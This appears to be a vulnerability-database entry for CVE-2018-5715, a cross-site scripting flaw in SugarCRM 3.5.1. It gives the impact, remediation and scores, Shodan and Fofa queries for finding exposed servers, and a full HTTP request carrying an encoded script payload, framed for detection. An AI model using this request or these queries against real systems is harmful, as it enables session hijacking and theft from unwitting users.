🔙 목록으로 돌아가기

CVE-2018-5715: SugarCRM 3.5.1 - Cross-Site Scripting

TitleSugarCRM 3.5.1 - Cross-Site Scripting
Authoredoardottt
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor.
CVSS Score6.1
EPSS Score0.06802
CVE IDCVE-2018-5715
CWE IDCWE-79
Shodan Queryhttp.html:"SugarCRM Inc. All Rights Reserved"http.title:sugarcrmhttp.html:"sugarcrm inc. all rights reserved"
Fofa Querybody="sugarcrm inc. all rights reserved"title=sugarcrm
Tags cve2018 cve sugarcrm xss edb vuln

🔍 Vulnerability Description

SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).

🌐 HTTP Request

GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-5715.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-5715.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A